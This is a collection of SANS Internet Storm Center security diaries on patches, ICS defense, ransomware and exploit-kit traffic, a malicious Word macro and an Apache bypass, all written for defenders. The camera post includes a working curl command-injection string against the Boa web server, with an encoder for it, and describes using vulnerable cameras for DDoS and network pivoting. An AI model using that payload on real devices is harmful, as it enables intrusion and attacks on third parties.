%%cve:2016-3272%%, an information disclosure vulnerability in the Windows Kernel.

I don't consider either vulnerability very serious.

As far as prioritizing the patches go, I would as usual attend to the Internet Explorer, Edge, Flash and Office patches first.

The print spooler issue is "interesting". An attacker could use the vulnerability to install arbitrary print drivers, which of course would lead to arbitrary code execution. As a workaround, Microsoft suggests that you restrict the printers your users can print to. This sounds like a good control, and you should use this vulnerability as a reason to make sure your printer configurations are sufficiently locked down.

For a full list of Bulletins, see our summary here. If you prefer a more structured view, you can also retrieve the bulletin data via our API here.

---

Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

7 Comments

Published: 2016-07-10

Lessons Learned from Industrial Control Systems

While at SANSFire a few weeks ago, I had the good fortune to sit in on Robert M. Lee as he taught ICS515: ICS Active Defense and Incident Response (https://www.sans.org/course/industrial-control-system-active-defense-and-incident-response).  I'm not responsible for defending a power plant's network, nor do I have a manufacturing floor in my enterprise.  I've also not worked with Modbus outside of CyberCity (https://www.sans.org/netwars/cybercity).  However, like many of you, I have certain business-critical systems running on legacy hardware or requiring now-unsupported operating systems.  These are the systems that you can't patch, or that, even if they experience a compromise, you can't immediately shut down.  How do you secure networks with such constraints?

Architecture and Isolation

"Why are these even connected to the Internet to begin with?" many would ask (see the last entry, "Pentesters (and Attackers) Love Internet Connected Security Cameras!" (https://isc.sans.edu/forums/diary/Pentesters+and+Attackers+Love+Internet+Connected+Security+Cameras/21231/) for more examples of the problem.) 

That is obviously step one: don't connect critical systems directly to the internet.  But what about your internal, flat network?  You may find yourself responsible for such a situation; how do you go about rearchitecting the network?  Start small by isolating the critical systems from the general network.  That MRI machine that you're not allowed to patch probably shouldn't be visible from everywhere in your network, and it probably shouldn't be able to reach everywhere in your network, or perhaps even the internet (it's not like it's reaching out to get regular updates or anything.)

If you have a poorly-architected network, you probably have a poorly-instrumented one.  Kill two birds with one box by dropping in a system between your general network and your critical systems.  This will act as both firewall and sensor.  Your critical systems won't be moving as much traffic as your perimeter and general network, so take the opportunity to collect full packet captures, or just run Bro to extract certain artifacts and keep netflow or ipfix data; this will be used later... 

Critical Systems do Critical Things, and only Critical Things

Just as you limit access to and from the critical systems, lock down what these can be used for.  These systems shouldn't have general internet access; if they require certain access, run a proxy for them to constrain it.  They also shouldn't be receiving email (although they might be sending it.)  It's simply the "policy of least privilege," re-tuned a little.

You've probably run into some resistance trying to get application whitelisting deployed out to your general users.  These critical systems are perfect locations to get started with the technique.  If any systems should have formal change-control policies, it is these: they update rarely, and you want to be alerted of any changes made to them as soon as possible.

Baseline!

These should probably be your most-instrumented systems on your network.  New services shouldn't be appearing and disappearing, the files on the system should remain relatively static, so something like tripwire or samhain (http://www.la-samhna.de/samhain/) won't be generating a lot of alerts, and if they do, they'll not likely be false alarms.

This is also a good place to start testing any anomaly detection tools.  These systems are tied closely to your business, so they'll likely mimic the activity cycles of your business.  Changes to their regular cycles should be detected and scrutinized.

Other Things I Learned...

There are going to be times when you just can't immediately follow your IR process: either the system is too unstable to support your forensic agents, or a business process will trump your urge to clean up a malware infection for a period of time.  This class gave me a framework for handling those decisions, as well as providing more options than simply "nuke it from orbit."

It also gave me more context around how Indicators of Compromise (IoC) are created and used in the ICS community.  In my circles, an IoC of "DNS traffic to 8.8.8.8" is usually scoffed at.  While that might be common behavior in a general user population, you probably shouldn't see it coming from your city's traffic-control network.

Why Should You Care?

On the surface, the ICS environment looks untenable: you can rarely patch, uptime is paramount, security is an afterthought in software development.  However, it is defensible.  If it can be done in this environment, it can be done in yours as well.

If you don't think you've got ICS equipment in your environment, ask yourself a couple of questions.  "Do I have a building that's four or more stories tall?"  If yes, you likely have some sort of building management solution in place.  Look for BACnet traffic (UDP/47808).

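If you want to look for BACnet devices yourself, one approach is to broadcast a Who-Is request on UDP/47808 and see what answers. Below is a rough Python sketch; the 12-byte Who-Is frame is my own reconstruction of the BACnet/IP encoding, so verify it against the specification before relying on it:

```python
import socket

# Assumed standard 12-byte BACnet/IP "Who-Is" broadcast frame:
#   BVLC: 0x81 (BACnet/IP), 0x0b (Original-Broadcast-NPDU), length 0x000c
#   NPDU: version 0x01, control 0x20, DNET 0xffff, DLEN 0x00, hop count 0xff
#   APDU: 0x10 (unconfirmed-request), 0x08 (Who-Is)
WHO_IS = bytes.fromhex("810b000c0120ffff00ff1008")

def discover_bacnet(timeout=3.0):
    """Broadcast Who-Is on UDP/47808 and return the IPs that reply."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sock.settimeout(timeout)
    seen = set()
    try:
        sock.sendto(WHO_IS, ("255.255.255.255", 47808))
        while True:
            _, addr = sock.recvfrom(1024)  # devices answer with I-Am
            seen.add(addr[0])
    except socket.timeout:
        pass
    finally:
        sock.close()
    return seen

# devices = discover_bacnet()  # run this on the network you are assessing
```

Only run this on a network you own or are authorized to assess.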
"Do I have a datacenter?"  If yes, then you likely have industrial Uninterruptible Power Supply units, air handlers, and coolers.  Say, who manages those for you?  Do they VPN to do that?  Do they have a cellular card in them for remote management?

-Kevin Liston

0 Comments

Published: 2016-07-08

Malware being distributed pretending to be from AU Fedcourts

Earlier today, people started reporting that they have received a subpoena email claiming to come from the Australian federal courts.

The email links through to various compromised sites, which redirect the user to a federalcircuitcourt.net web server.  Once on the web server, you are expected to enter a number and the captcha shown before a case.js file is downloaded.   

The case.js file is being analysed at the moment, and this diary will be updated with any findings.  In the meantime, feel free to block the domain federalcircuitcourt.net in your web proxies. This is not a legitimate domain. 

The federal circuit court has issued a media release -->  http://www.federalcircuitcourt.gov.au/wps/wcm/connect/fccweb/about/news/mr080716

​If you receive one of these emails feel free to contact us via the contact form and if you can provide the headers of the email and the URL being used for the link that would be appreciated. 

Regards

Mark H - Shearwater

0 Comments

Published: 2016-07-07

Patchwork: Is it still "Advanced" if all you have to do is Copy/Paste?

The term "APT" often describes the methodology more than it does describe the actual exploit used to breach the target. Target selection and significant recognizance work to find the right "bait" to penetrate the target are often more important than the final vulnerability that is exploited. Traditional defenses like anti-malware systems and blocklists are not tuned to look for the vulnerability being exploited but are more looking for specific known exploits which can easily be obfuscated using commodity tools.

Cymmetria today released a research report showing results of a "deception" campaign they launched to learn more about a particular actor. In this case, the attack was targeting specific individuals using a spear phishing campaign, which are "APT" characteristics. The vulnerability being exploited (CVE-2014-4114) is about two years old and only affects PowerPoint 2003 and 2007, something you would expect to be patched by now. Privilege escalation was achieved using the UACME code which can be found in the public domain.

To exploit and pillage the infected system, open source software like Metasploit was then used to establish a remote shell via Meterpreter.

Cymmetria calls this a "Copy / Paste APT" in that it used code that was mostly copy/pasted from various well-known sources and methods which would be taught in an intermediate penetration testing class.

Another interesting aspect is the way in which Cymmetria used its deception tools. The overall idea of deception isn't exactly new, but it has seen a renaissance in the last couple of years. In the past, "honeypots" were mostly used by researchers to learn more about commodity attacks. Researchers usually configured systems with known vulnerabilities in unprotected networks to lure attackers and to learn more about their methods and objectives. Modern commercial deception tools take a slightly different approach, more along the idea of "honey tokens" than honeypots. The goal of these tools is to detect more advanced attacks. Systems are not made particularly vulnerable to entice the attacker; instead, they are seeded with "honey tokens," small bits of data that entice the attacker to pursue specific targets and that are used to detect the attacks. For example, Cymmetria deployed specific file shares that would look enticing to an attacker, and left documents behind with pointers to RDP servers that were part of the deception campaign. 

In this particular case, after the system was infected via the PowerPoint document, the attacker exfiltrated numerous documents from the system. It took about three days until the attacker discovered the deception file share and tried to access it. The attacker then took the bait, and also connected to the RDP system. However, they were not able to log in as the document describing the RDP service did not include credentials. Instead, credentials would have been available in memory on the infected system (e.g. the attacker would have to run mimikatz).

Cymmetria published IoCs as part of their release. You can use them to look for this threat in your systems. But I think the lesson should be that even more advanced actors can be tricked into using honey tokens, which creates a relatively low-cost opportunity to detect a compromise early. In this case, it took about three days, which doesn't sound great at first, but keep in mind that these attacks are usually only detected after months using more traditional means.

[1]  https://www.cymmetria.com/patchwork-targeted-attack/

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

0 Comments

Published: 2016-07-06

Pentesters (and Attackers) Love Internet Connected Security Cameras!

A recent story making the rounds in both the infosec and public press is the recent use of internet-connected security cameras as a base for DDOS attacks.  They don't have a lot of CPU, but they're Linux platforms that are easily hackable, never get updated, and usually have good bandwidth available to them.

This shouldn't come as any surprise to folks who are in the security business, or those who do any kind of a product eval before they plug new gear into their network.  I see security cameras on network assessments and penetration tests regularly.  A simple NMAP -sV scan (to show service versions) will typically light up a security camera as:

PORT      STATE SERVICE     VERSION
23/tcp    open  telnet      security DVR telnetd (many brands)
80/tcp    open  http        Boa HTTPd 0.94.14rc21
1025/tcp  open  NFS-or-IIS?
9000/tcp  open  tcpwrapped
56575/tcp open  unknown

The give-away is that Boa web server.  For some reason, security camera vendors seem to have standardized on this as their web service.  Or more likely, one vendor has, and they're selling the chipset to everyone else to put inside of their cases.

Let's take a look at that.  The Boa project has an active website (www.boa.org), and version 0.94.14rc21 is listed as the latest development release, complete with signatures.  Sounds great so far right?  Except when we look at the code, it was posted Feb 2005 (yikes!).  It looks like this project is no longer seeing active development (as of 11 years ago!).  So even if the vendor supplies updates and you apply them, there's no fixing the web portal that faces the network - and so often the public internet.

A quick google shows that this version of the web server is subject to a command injection vulnerability, as described in CVE-2009-4496. Exploit-db has an example curl one-liner that demonstrates this:  https://www.exploit-db.com/exploits/33504/ , vulndb has a larger write-up here: https://vuldb.com/?id.51542

Nessus has identified this remote code exec issue for years (plugin 47463).

Shodan identifies 936,736 of these servers on the public internet - because of course it's just too much trouble to VPN in to view the video footage on your ATMs or other physical assets.

So a DDOS really is that simple.  Just using a curl script, you can start a "ping -t" or "ping -t -l 1000" against your victim (I picked 1000 to keep the packets below the typical MTU and avoid any loss due to fragmentation).  With a few thousand camera devices, you have what the victim will perceive as a sophisticated DDOS attack.  Your curl string to attack a test "1.1.1.1" IP address with default-sized icmp echo requests would be:
curl -kis http://camera.public.ip.address/%1b%5d%32%3b%70%69%6e%67%20%2d%74%20%31%2e%31%2e%31%2e%31%07%0a

The first few characters are the escape sequence: %1b%5d%32%3b

The string "ping -t 1.1.1.1" is represented in hex as: 70%69%6e%67%20%2d%74%20%31%2e%31%2e%31%2e%31

The string terminates with: %07%0a
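Putting those three pieces together, a few lines of Python reproduce the exact encoded string used in the curl example above:

```python
# Rebuild the injection string: terminal-escape prefix + command + BEL/LF suffix.
# 1.1.1.1 is the same test target used above.
cmd = "ping -t 1.1.1.1"
payload = "\x1b]2;" + cmd + "\x07\x0a"  # ESC ] 2 ; ... BEL LF
encoded = "".join("%{:02x}".format(ord(c)) for c in payload)
print(encoded)
# → %1b%5d%32%3b%70%69%6e%67%20%2d%74%20%31%2e%31%2e%31%2e%31%07%0a
```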

Wireshark catches the icmp echo requests (replies are filtered out) - yes, this did work first time for me:

That aside, what folks are missing in all of this is that these cameras are usually connected on the inside, trusted network, right there next to the servers.  Folks seem to find it too much trouble to make a DMZ for these things.  So the majority of these cameras make dandy pivots inbound to the customer's servers and workstations - your command string isn't restricted to "ping", you can run anything you want on the box (that the web service has rights to).  From the public internet, you could easily craft an inbound proxy or relay, giving you full access to the internal network - or at least long enough to establish a more "reliable" reverse shell or VPN solution.  Or just use TeamViewer or LogMeIn if you have that kind of access; you're less likely to trigger an IPS if you use the same tools that the IT group uses!

The remediation for this?  There are a number of things you can do, depending on your situation:

  • Scan your network, look for vulnerable services like this.  NMAP will do the job with some legwork, tools like Nessus or OpenVAS will make it easier and smack you with the proverbial "LOOK HERE" two-by-four.
  • Put vulnerable things that can't be fixed and can't easily be replaced (like these cameras) into a DMZ or a "jail" VLAN, and don't give that subnet access to anything on the inside network.
  • Restrict access to these cameras to VPN or internal access only (you can reach them, they can't reach you).
  • If you have a vendor monitoring your cameras, do the VPN thing with them also.  If you MUST give them direct access, only allow their IP or subnet.  (But also start looking for a different security monitoring vendor if you have to do this)
  • Most important of all, try to head this stuff off at the pass.  Scan new gear during the evaluation phase.  If it doesn't pass your assessment for some reason, phrase your report in business terms, outlining the real risks to the business.  You can't get buy-in from the folks who make these decisions by saying "No, but it's too complicated for me to explain it to you, just No."

As always, preventing these problems before they occur is the easiest way to deal with them.  You won't catch them all, but hopefully you'll catch things like this!

If you find one of these cameras on your network, please let us know in our comment section!  Or better yet, if you have a network-connected security camera that has a different web server, please share the server and version in our comments!

===============
Rob VandenBrink
Compugen

0 Comments

Published: 2016-07-06

CryptXXX ransomware updated

Introduction

When generating exploit kit (EK) traffic earlier today, I noticed a change in post-infection activity on a Windows host infected with CryptXXX ransomware.  This happened after an infection caused by Neutrino EK triggered from the pseudoDarkleech campaign.


Shown above:  Flow chart for Neutrino EK/CryptXXX caused by pseudoDarkleech.

This morning, the decryption instructions for CryptXXX ransomware looked different.  A closer examination indicates CryptXXX has been updated.  As I write this, I haven't found anything online yet describing these recent changes, so this diary takes a quick look at the traffic.


Shown above:  An infected Windows desktop from earlier today.

Details

Today's EK traffic was on 198.71.54.211 using the same domain shadowing technique we've seen before from various campaigns using Neutrino EK (formerly using Angler EK [1, 2, 3] before Angler disappeared).  Post-infection traffic was over 91.220.131.147 on TCP port 443 using custom encoding, a method CryptXXX has used since it first appeared earlier this year [4].


Shown above:  Traffic from today's Neutrino EK/CryptXXX infection filtered in Wireshark.

Below are some screenshots of the Neutrino EK traffic.


Shown above:  Neutrino EK landing page.


Shown above:  Neutrino EK sends a Flash exploit.


Shown above:  Neutrino EK sends the payload (it's encrypted).

In a change of behavior, text and HTML files for the CryptXXX decryption instructions are downloaded in the clear during the post-infection traffic.


Shown above:  Text-based decryption instructions sent on 91.220.131.147 over TCP port 443.


Shown above:  HTML-based decryption instructions sent on 91.220.131.147 over TCP port 443.

I used my Security Onion setup to see what Snort-based alerts triggered.  Looks like the EmergingThreats team already has a signature covering the new CryptXXX post-infection traffic.


Shown above:  My results from Sguil on Security Onion using the ET Pro ruleset.

Below are two screenshots with HTML decryption instructions from the infected Windows host's desktop.

Final words

Although I haven't noticed anything yet, I'm sure some of the usual sources will have a more in-depth article on these recent changes in CryptXXX ransomware.  This diary is just meant to give everyone a heads-up.

Pcap and malware for this diary are located here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

References:

[1] http://blogs.cisco.com/security/talos/angler-domain-shadowing
[2] https://blog.malwarebytes.com/threat-analysis/2015/04/domain-shadowing-with-a-twist/
[3] https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows
[4] https://www.proofpoint.com/us/threat-insight/post/cryptxxx-new-ransomware-actors-behind-reveton-dropping-angler

0 Comments

Published: 2016-07-06

Hiding in White Text: Word Documents with Embedded Payloads

This is a guest diary by Yaser Mansour. Due to the extensive use of images, please note that all the images are clickable to view them at full size. A PDF version of this diary is available here

Malicious macros in Office documents are not new, and several samples have been analyzed here at the ISC Diary website. Usually, the macro script is used to drop the second-stage malware either by reaching out to the internet or by extracting a binary embedded in the Office document itself. In this post, we will examine two similar malicious documents that were observed separately, each dropping a different malware sample, namely NetWiredRC and iSpy.

There are several interesting facts about the samples we are going to analyze today:

  1. The macro embedded in the Office document does not reach out to the internet. Instead, it extracts a binary embedded in the Word document itself in ASCII hex format and writes it to disk.
  2. Both malicious Word documents were observed separately. However, both use the same technique to extract the embedded binary, as well as the same decoy message enticing the end user to enable macros.
  3. During network forensics of the NetWiredRC malware, a new C&C command was observed which was not reported by [1][2]. This also resulted in a total of 9 custom Snort signatures being submitted and published in the Snort Community Ruleset [3][4].
  4. The iSpy sample generated different network traffic patterns from those observed previously. More about this in the following sections.

Brief History of NetWiredRC and iSpy Malware Samples

The NetWiredRC RAT family has been extensively discussed by security researchers [1][2]. Recently, TALOS released Snort signatures to detect NetWiredRC over the network [3], and a new signature for the new NetWiredRC command [4].

iSpy was first observed by the author during January 2016 with the sample b33c5ba388f8a32006133cb8888a9370. This sample performed its C&C over HTTP as seen in the below screenshot and Snort signatures were released [4].

Picture 1

Other samples were observed during March and April 2016 (65ee535f0efcb30626ce5c8e7763e782 and cd3a43d3504925a396183b467b0980cb, respectively). Both of these samples also used HTTP for their C&C communication. One of the latest samples observed was extracted from the embedded payload in the Word document discussed in the remainder of this article. This recent sample performs its C&C over SMTP for both initial and exfiltration communication, as shown in the screenshots below.

Malicious Word Documents Analysis

Both malicious documents implement the same algorithm to extract the embedded binary. While the focus will be on the document embedding the NetWiredRC sample, we will attempt to provide a side-by-side analysis of both documents. Throughout the remainder of this post, comparative screenshots will show the document dropping NetWiredRC first and the iSpy sample second.

Both sample documents have exactly the same decoy message, enticing the unsuspecting user to disable Protected View and enable macros, as seen in the below screenshot.

Interestingly, each document consisted of a large number of "empty" pages, with the only visible text as shown in the above screenshot. More accurately, the first document consisted of 232 pages; the second malicious Word document consisted of 528 pages.

The document was initially inspected for the presence of macros using oledump.py [5]. From the screenshots below, we can see that the document indeed embeds a macro. The VBScript code was extracted using oledump.py; olevba.py [6] can also be used. Both tools are included in the REMnux [7] image.

Closely inspecting the dumped and obfuscated VBScript, there were no indications that the script reaches out to the internet. Going further through the code, there was an interesting function, as shown in the below screenshot. Please note the highlighted variable and its data type, as it plays a major role in how the embedded second-stage binary is extracted from the Office document.

Continuing to inspect the script, it becomes apparent how the second-stage binary is dropped to the local disk. The script leverages the Word Object Model [8] to access the Paragraph Object Members [9]. More about this later. In order to understand why the script would access paragraphs from the document itself, the document was opened with macros disabled to prevent the script from executing.

Scrolling through the document to inspect what these 232 pages contain showed only empty pages containing nothing, or did they? To verify, the document was extracted as a ZIP archive, since it is an OOXML document. Extracting the document also helps in getting access to its internal structures.  Once extracted, we end up with a set of XML files. We are interested in one file in particular: document.xml. This file contains the actual content of the document in XML representation.

An OOXML file contains element blocks representing the various content aspects of a document, for example how paragraphs in a Word document are structured as XML [10]. In a nutshell, a paragraph is expressed with the XML element block <w:p>. Text within a paragraph is expressed by the XML element <w:t>. Within the paragraph block, other XML elements may exist to represent things like formatting (<w:rPr>). For more information about these elements, refer to the ECMA-376 Standard of the Office Open XML File Formats [11] and [12].

Back to our document.xml file: when viewed in a browser, we notice that we have 24 paragraphs, denoted by the <w:p> element as explained earlier. Inspecting and mapping the elements to the actual paragraphs in the document leads to the conclusion that the last paragraph spans the 232 pages. This paragraph not only contains text, but also formats that text to be white (#FFFFFF) as a technique to hide it from the viewer of the document.
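This hiding technique is easy to flag programmatically. Below is a minimal Python sketch; the XML snippet is an invented illustration of the structure, not an excerpt from the actual sample:

```python
import re

# Invented document.xml fragment: a run colored white (#FFFFFF) hiding hex text
doc_xml = ('<w:p><w:r><w:rPr><w:color w:val="FFFFFF"/></w:rPr>'
           '<w:t>A3B4...</w:t></w:r></w:p>')

# Flag any run properties that set the font color to white
white_runs = re.findall(r'<w:color w:val="FFFFFF"/>', doc_xml)
print("white-colored runs:", len(white_runs))
```

The same search can be run against the document.xml extracted from any suspicious .docx file.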

So we have a VBScript that defines a variable as a paragraph, and a hidden paragraph that spans 232 pages. This indicates that the VBScript does in fact access the Word Object Model in order to reach the paragraph. Inspecting the VBScript, we find evidence that the script indeed attempts to access the paragraph objects, and the text within them, which are included in the document. Specifically, the script is interested in paragraph number 24.

A bird's-eye view of this segment of the script suggests that it loops through the paragraphs available within the document, and the text embedded within them, until it reaches paragraph 24. From that paragraph's text, the script grabs 2 letters (or 1 string hex byte; see the below 2 screenshots), "un-hexifies" them to get the decimal/numerical representation using the "&H" (the hS variable value) hexadecimal literal [13], and then XORs that value with the hexadecimal key &HEE (0xEE) to produce bytes that serve a specific purpose. 

Let’s take the first two bytes from the below screenshot to test this logic. The first 2 string hex bytes are “A3 B4”. The below table breaks down the conversions performed by the script snippet above. Do you see anything familiar in the table? The two bytes “4D 5A” or “MZ” are the magic number of the DOS MZ executable.

Raw String Hex Byte Decimal Representation (&H) Decimal Representation (Xor 0xEE) Hex Representation
A3 163 77 0x4D
B4 180 90 0x5A

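The same conversion can be expressed in a few lines of Python (my reconstruction of the logic described above, not the author's original script):

```python
# Two hex characters -> integer -> XOR with 0xEE -> one byte of the dropped file
hidden_text = "A3B4"  # first four characters of paragraph 24, per the table above

decoded = bytes(
    int(hidden_text[i:i + 2], 16) ^ 0xEE
    for i in range(0, len(hidden_text), 2)
)
print(decoded)  # → b'MZ', the DOS executable magic number
```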
To automate the above algorithm, the following Python script was created. 

Once each byte is extracted and converted, it is written to disk byte by byte until there is no more text left in the paragraph. Afterward, the script calls a function, passing it the name of the just-generated binary in order to execute it. That function uses the built-in function Shell() [14] to execute the second-stage binary, and is captured in the below screenshot.

To put everything together, the below screenshot represents the beautified and commented version of both functions discussed earlier.

The below screenshot represents the same "ParagraphRemove()" function (beautified and commented) from the second malicious Word document, which dropped the iSpy malware sample. An interesting note from both malicious Word documents is the "Startincex" misspelling. 

References:

[1] https://www.circl.lu/pub/tr-23/
[2] http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/
[3] http://blog.snort.org/2016/03/snort-subscriber-rule-set-update-for_29.html
[4] http://blog.snort.org/2016/05/snort-subscriber-rule-set-update-for_31.html
[5] https://blog.didierstevens.com/programs/oledump-py/
[6] http://www.decalage.info/vba_tools
[7] https://remnux.org/
[8] https://msdn.microsoft.com/en-us/library/kw65a0we.aspx
[9] https://msdn.microsoft.com/en-us/library/office/ff839491.aspx
[10] http://officeopenxml.com/WPparagraph.php
[11] http://www.ecma-international.org/publications/standards/Ecma-376.htm
[12] https://msdn.microsoft.com/en-us/library/office/gg607163(v=office.14).aspx
[13] https://msdn.microsoft.com/en-us/library/s9cz43ek.aspx
[14] https://msdn.microsoft.com/en-us/library/xe736fyk(v=vs.90).aspx

 

1 Comments

Published: 2016-07-05

Apache Update: TLS Certificate Authentication Bypass with HTTP/2 (CVE-2016-4979)

Apache released an important update today to fix a vulnerability that affects servers that have http/2 enabled and use TLS client certificates for authentication.

Apache 2.4.18 through 2.4.20 is vulnerable if:

- TLS certificates are used for authenticating clients (look for the "SSLVerifyClient require" directive in your configuration file)

- http/2 is enabled. (see if the "Protocols" line includes h2 and/or h2c). 
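To illustrate, a hypothetical virtual host meeting both conditions (server name and file paths are made up for this sketch) could look like this:

```apache
# Hypothetical vulnerable setup (Apache 2.4.18-2.4.20):
# both conditions from the advisory are present.
Protocols h2 http/1.1

<VirtualHost *:443>
    ServerName secure.example.com
    SSLEngine on
    SSLCertificateFile    /etc/ssl/certs/server.crt
    SSLCertificateKeyFile /etc/ssl/private/server.key

    <Location /protected>
        # TLS client certificate authentication -- the control that
        # http/2 requests could bypass under CVE-2016-4979.
        SSLVerifyClient require
        SSLVerifyDepth  2
    </Location>
</VirtualHost>
```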

Only access over http/2 is affected. Access via http/1.1 is still properly controlled even if http/2 is enabled. Over TLS, clients that support http/2 will likely prefer it over http/1.1.

http/2 is not enabled by default in any currently shipping version of Apache.

To quickly check your network traffic for http/2 use, you can use this tshark line:

tshark -Y 'ssl.handshake.extensions_alpn_str == "h2"' -n -i en0  \
-T fields -e ip.src -e ip.dst -e ssl.handshake.type -e ssl.handshake.extensions_server_name \
-e ssl.handshake.extensions_alpn_str
 

It will list the client requests as well as the server responses that contain http/2, including the host name that the client is trying to reach. For example:

10.5.1.12    216.58.192.66    1    cm.g.doubleclick.net    h2,spdy/3.1,http/1.1
216.58.192.66    10.5.1.12    2        h2

In this handshake, the client offers http/2, spdy/3.1 as well as http/1.1 to cm.g.doubleclick.net . The server then selects http/2 (h2).

 

 

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

2 Comments

Published: 2016-07-03

Is Data Privacy part of your Company's Culture?

I was reading a while back about the FDIC data losses: the agency suffered five major breaches of taxpayers’ personally identifiable information starting on Oct 30, 2015, which could have been prevented with a combination of host-based and network controls to keep sensitive data from leaving the network. According to the information released, the breaches occurred because individuals copied data to USB drives which then left the premises. A strong and effective security policy restricting access to USB drives could have helped prevent this. All removable drives should be encrypted, and write access to removable drives should be limited for accountability.
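As one sketch of such a write restriction on Windows hosts (the registry path is real, but in practice you would deploy this, or the equivalent Group Policy setting [4], centrally rather than per machine):

```reg
Windows Registry Editor Version 5.00

; Makes USB mass-storage devices read-only on this host, so data can be
; read from removable media but not copied onto it.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]
"WriteProtect"=dword:00000001
```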

Here are three tips I think can help:

1- Get HR involved and provide awareness training [1] on a regular basis

Have the human resources (HR) department do awareness training on a regular basis, with an emphasis on the organization's data access policy, and explain the consequences to the company and to the individual when data is lost. If the data policy changes, HR must explain clearly what those changes are and why they were implemented.

2- Track, tag and audit sensitive data

It is possible to protect corporate data by tagging and classifying it properly. Employees should have access to the data they need to do their jobs (need to know) and nothing else. Auditing and reporting on who accesses what helps you understand whether the proper controls and safeguards are working. These controls should also cover who prints which documents. This matters especially if you do business in the EU: in May 2018, the EU [2] is implementing a new directive on data protection. This update means stiffer penalties of "[...] up to 4% of their global annual turnover."[3]

3- Encrypt all external devices and identify who can transfer sensitive data

First, encrypting all external devices used to copy sensitive data is a good idea: if a device gets lost, it cannot be accessed without the proper encryption key. Next, have a policy that identifies who can copy and save sensitive data on external media. As per item #2, track, audit and report when that data was accessed or transferred and by whom.

Is Data Privacy part of your Company's Culture? Do you feel the policies used to protect data within your organization are adequate?

[1] https://securingthehuman.sans.org/
[2] http://ec.europa.eu/justice/data-protection/reform/index_en.htm
[3] http://europa.eu/rapid/press-release_MEMO-15-6385_en.htm
[4] https://technet.microsoft.com/en-us/magazine/2007.06.grouppolicy.aspx

-----------
Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

3 Comments

Published: 2016-07-02

Change in patterns for the pseudoDarkleech campaign

Introduction

I'm used to seeing large blocks of code containing 12,000 to 15,000 characters associated with the pseudo-Darkleech campaign.  Below is an example from earlier this week.


Shown above:  Start of pseudo-Darkleech injected code from a compromised website.

It's a very distinctive pattern, and it's easy to find if you know what you're looking for.  But later in the week, things changed.  Now I'm seeing a much different type of script in websites compromised by the pseudo-Darkleech campaign.


Shown above:  Start of pseudo-Darkleech injected code from the same website three days later.

Here are Pastebin links for the code before and after the change:

This is an interesting development that deserves more attention.

Background

I've investigated the Darkleech campaign since Sucuri started calling it "pseudo-Darkleech" back in March 2015, and I've tracked how script associated with this campaign has evolved over time [1].  Earlier this year, pseudo-Darkleech started distributing CryptXXX ransomware [2].  By June 2016, the campaign switched to using Neutrino exploit kit (EK) [3] after Angler EK disappeared from our radar [4].

Below is a current flow chart for CryptXXX ransomware infections caused by the pseudo-Darkleech campaign.


Shown above:  Chain of events for a successful infection.

Keep in mind that a campaign consists of an EK plus an infrastructure that directs potential victims to the EK [5].


Shown above:  A slide from my presentation about exploit kits.

Since February 2016, injected code from the pseudo-Darkleech campaign has been a large block of highly obfuscated script.  It's often more than 12,000 characters long.  Back in April 2016, Daniel Wesemann (another ISC handler) posted a two-part diary on how to decode this obfuscated pseudo-Darkleech script [6, 7].  But now the pseudo-Darkleech campaign is using a fairly straightforward iframe without any obfuscation.

Details

I first noticed the change on Thursday, 2016-06-30 while reviewing compromised websites [8].  Traffic from compromised site gennaroespositomilano[.]it had the typical large block of pseudo-Darkleech injected code on Tuesday [9].  But the same compromised website had much different injected code three days later [10].

Decryption instructions for CryptXXX ransomware sent by the pseudo-Darkleech campaign have remained consistent, despite the recent change of pattern for the campaign's injected script.

CryptXXX decryption instructions use different domains for different campaigns.  For example, domains used by CryptXXX samples from the EITest campaign are consistently different than domains used by CryptXXX samples from the pseudo-Darkleech campaign.

Since 2016-06-21, the pseudo-Darkleech CryptXXX samples I've collected have used 2mpsasnbq5lwi37r as the prefix for tor domains in the decryption instructions.  However, I expect these domains will change sometime within the next week or so.


Shown above:  Domains from current pseudo-Darkleech CryptXXX decryption instructions.

Final words

EK-based campaigns usually evolve through small changes.  In this case, the pseudo-Darkleech campaign only changed its injected script.  However, many security professionals may still be looking for that very distinct, massive block of code previously associated with this campaign.

Hopefully, this diary helps people become aware of the change.

---

Brad Duncan
brad [at] malware-traffic-analysis.net

References:

[1] http://researchcenter.paloaltonetworks.com/2016/03/unit42-campaign-evolution-darkleech-to-pseudo-darkleech-and-beyond/
[2] https://isc.sans.edu/forums/diary/Angler+Exploit+Kit+Bedep+and+CryptXXX/20981/
[3] https://isc.sans.edu/forums/diary/Neutrino+EK+and+CryptXXX/21141/
[4] https://www.proofpoint.com/us/threat-insight/post/Neutrino-Exploit-Kit-Distributing-Most-CryptXXX
[5] http://researchcenter.paloaltonetworks.com/2016/06/unit42-understanding-angler-exploit-kit-part-1-exploit-kit-fundamentals/
[6] https://isc.sans.edu/forums/diary/Decoding+PseudoDarkleech+1/20969/
[7] https://isc.sans.edu/forums/diary/Decoding+PseudoDarkleech+Part+2/20975/
[8] http://www.malware-traffic-analysis.net/2016/06/30/index.html
[9] http://www.malware-traffic-analysis.net/2016/06/28/index.html
[10] http://www.malware-traffic-analysis.net/2016/07/01/index.html

1 Comments

Published: 2016-07-01

APT and why I don't like the term

Introduction

In May 2015, I wrote a diary describing a "SOC analyst pyramid."  It describes the various types of activity SOC analysts encounter in their daily work [1].  In the comments, someone stated I should've included the term "advanced persistent threat" (APT) in the pyramid.  But APT is supposed to describe an adversary, not the activity.

As far as I'm concerned, the media and security vendors have turned APT into a marketing buzzword.  I do not like the term "APT" at all.

With that in mind, this diary looks at the origin of the term APT.  It also presents a case for and a case against using the term.

Origin of "APT"

In 2006, members of the United States Air Force (USAF) came up with APT as an unclassified term to refer to certain threat actors in public [2].

Background on the term can be found in the July/August 2010 issue of Information Security magazine.  It has a feature article titled, "What APT is (And What it Isn't)" written by Richard Bejtlich.  The article is available here.


Shown above: An image showing the table of contents entry for Bejtlich's article.

